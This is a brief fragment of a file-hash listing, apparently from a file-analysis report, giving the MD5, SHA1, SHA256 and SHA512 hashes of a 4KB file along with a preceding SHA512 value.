SHA51233fcf014dba7718a7e99a4860854b6067e525c8e1ab187dd9468fd4913fe7fe450b89beb5c915e424288857ce6137f96ef970d26b9bd061991d1d6a97e63b853
-
Filesize
4KB
MD520706974cd5e49fc4884aadafec40a92
SHA13455618aa35e016cf696159db1805b3217e5b90e
SHA256acee8d2a27fb2d41fa6612ab732996fe00337f5391959399a1daa3161b23e2fa
SHA512470c1ef90e385164250b3d1ad89556a32eccb537dc71eba7b49b70858c47039f491255e4a4b750783bea98886a798ee17de4006878a9a6789fa297a89f3d4c78